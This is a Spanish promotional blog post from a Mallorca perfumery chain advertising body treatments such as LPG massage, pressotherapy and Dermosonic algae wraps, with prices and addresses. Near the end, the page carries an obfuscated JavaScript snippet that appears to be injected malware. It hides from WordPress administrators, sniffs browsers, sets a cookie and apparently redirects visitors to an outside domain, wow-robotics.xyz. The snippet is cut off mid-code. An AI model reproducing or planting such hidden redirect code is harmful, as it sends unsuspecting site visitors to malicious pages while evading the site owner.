operación bikini perfumerías Tin Tin

Con la llegada del buen tiempo empezamos a cuidarnos un pelín más y ya preparamos nuestra a punto de cara al veranito.

Como queremos ponérselo más fácil a nuestros clientes damos la bienvenida a la primavera con increíbles ofertas en tratamientos corporales en nuestros institutos de belleza.

Uno de los tratamientos corporales estrella de nuestros institutos de belleza son las sesiones de LPG.

El LPG se realiza a través de una máquina que con sus rodillos mecánicos la esteticista realiza una presión sobre el tejido a trabajar insistiendo en las zonas más problemáticas consiguiendo liberar las grasas resistentes.

Se trata de una de las técnicas anticelulíticas más efectivas con la que conseguiremos múltiples beneficios:

  • Anticelulítico (Principal beneficio por el que es reconocida)
  • Reafirmante, ayuda a nuestra piel a recuperar la firmeza.
  • Moldeadora, notaremos que perderemos unos centímetros tras las sesiones.
  • Drenante, nos ayuda a mejorar la circulación de la sangre.

El tratamiento con LPG está especialmente indicado para personas que están iniciando una dieta, o que quizás tienen un poco de sobrepeso y quieren perder esos centímetros que han engordado. También es común el uso en deportistas que lo utilizan para complementar los masajes deportivos.

Detalles a tener en cuenta:

El tratamiento tiene una duración de 60 minutos, el cliente debe vestirse un mono-malla deshechable  al inicio de la sesión.

En los Institutos de Belleza de Perfumerías Tin Tin se trabaja todo el cuerpo a excepción de los senos,  en determinados centros de estética este servicio se tarifa por zonas localizadas.

Se recomiendan realizar 2 sesiones por semana. Con 15-20 sesiones ya obtendremos buenos resultados.


PresoterapiaOtro tratamiento en promoción es la Presoterapia, se trata de un sistema que funciona con bombas de aire que cubren las piernas desde la cintura hasta la punta de los pies formando una L.Sus cámaras de aire separadas en distintas zonas se centran en mover el flujo venoso y linfático.

Es ideal para personas con piernas cansadas, con problemas de circulación. Y en el caso de embarazadas es muy buen beneficioso pero solo se aplica en piernas.

Mejora el aclaramiento del líquido extracelular, reduce la hinchazón, inflamación y los edemas, alivia la fatiga de las piernas y mejora el flujo de oxígeno a través de todo el cuerpo. Nuestra consejera de belleza enciende cada cámara, que se llena de aire y envía una ligera presión a cada miembro. La presión simula un masaje profundo que utiliza la presión suficiente para llegar debajo de la superficie de la piel. Cada sesión de presoterapia suele durar unos 40 minutos y se recomienda que se repita cada semana durante ocho semanas.

Disfruta por sólo 15€/sesión en nuestro Instituto de Belleza de la calle Olmos, 18.
Y por último pero no por ello menos importante el tratamiento de envoltura de algas con la exclusiva maquinaría Dermosonic.

Un excelente anticelulítico que aplicando 2 sesiones por semana hasta completar 5 sesiones podremos observar resultados.

Se trata de la última tecnología del mercado que ayuda a combatir la flacidez, y modelar la figura eliminando la grasa localizada.

Dota a la piel de elasticidad, luminosidad y suavidad. El efecto es de pérdida de volumen además de una relajación muscular por la acción de los ultrasonidos sobre las fibras nerviosas.
Favorece la elasticidad de los tejidos y mejora la penetración de principios activos. Está destinado al tratamiento de aquellas alteraciones que afectan a la dermis y subdermis, combinando dos terapias: ultrasonidos y terapia subdérmica no invasiva (NIST).
En los Institutos de Belleza complementamos este tratamiento con una envoltura de algas de Decleor, que potencian el efecto por la propiedad anticelulítica de las algas.Ahora compra un bono de 5 sesiones por sólo 125€. Cada sesión tiene una duración aproximada de 60 minutos.

Tratamiento disponible en nuestros Institutos de Belleza de:

  • Calle Olmos, 18
  • Calle Sindicato, 67
  • Plaza Juan Carlos I, Local 7

Si eres de Mallorca, ya no tienes excusa para ponerte a punto para este verano. Anímate y prueba nuestros tratamientos de cabina en nuestros Institutos de Belleza.

Tratamientos en cabina-

var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone